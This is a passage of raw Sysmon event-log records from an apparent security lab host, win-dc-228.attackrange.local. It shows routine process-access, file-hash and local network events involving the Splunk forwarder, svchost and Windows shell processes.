Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73740E344E0BFC5337DC1543A172C5F7,SHA256=A188E6955F90A82B0EA87D2D35D385B0BC5D5AC775EBE913E684E99D5CB46762,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203904Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.618{5ABCFE62-EA0F-6040-604E-00000000AD01}58082744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203903Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA0F-6040-604E-00000000AD01}5808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203902Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203901Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203900Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203899Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203898Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA0F-6040-604E-00000000AD01}5808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203897Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.493{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA0F-6040-604E-00000000AD01}5808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203896Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.494{5ABCFE62-EA0F-6040-604E-00000000AD01}5808C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002203908Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:20.868{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC957BB491F8E9F38907F23F9A9CD79A,SHA256=1A96061C2988944CA86E20B0D194FB1AB5197651E787B80974498655ACF13809,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203910Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:16.922{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-54330- 23542300x80000000000000002203909Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:21.868{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3188CEA5725CE11C5C8C887DEF93D01A,SHA256=EBD27C731E375AA684C50BC96B3954CA7873D6F51DCB217F6E95632FCBFF1858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203913Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:22.884{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696E5D412B4D6FC263A9C307B3D2365E,SHA256=C79E9F8875BC6217455A4DCD7CF8E647B7B0B298FB76B794DFE588AAF2D5DD9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203912Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:22.243{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D88AA42E29F2099399B66D668A9F15D7,SHA256=7553DDDC3DE1A57203977B142B2E880C1828004D5B83270C9605CF22A80F03FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203911Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:22.180{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=51ABA95821D742E5EF6AE6406A14FC9D,SHA256=48AF99A63C65D6C19779B5FF89A61AF06C2F6FAA331C4A7D1ED7494C86CB4069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203915Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:23.884{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECC451333890CEB173ED22DE9D06E7A5,SHA256=9E8313FE9B0B765443C292F2F64CF97B2A0F0C09365B1CB16A7DAEF38C443AE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203914Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:19.001{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60740-false10.0.1.12-8000- 23542300x80000000000000002203916Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:24.884{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C489379DFD2513F1F050CA03D17EFE2,SHA256=8662D3997EB7EB6848ED77BE373FCD0E60E8CDE495DFAFACD4367E26688B8FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203917Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:25.899{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53B9CFA48ECE0C6424CA815F3CE550D,SHA256=E747555A55092D1F7F3A958C74BF581E1FDF4E317BA1CB9FA5108D3151343209,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203948Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203947Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203946Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203945Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203944Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203943Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203942Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203941Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203940Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203939Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203938Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203937Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203936Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203935Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203934Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:09:26.634{5ABCFE62-842F-603E-0D00-00000000AD01}912932C:\Windows\system32\svchost.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203933Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 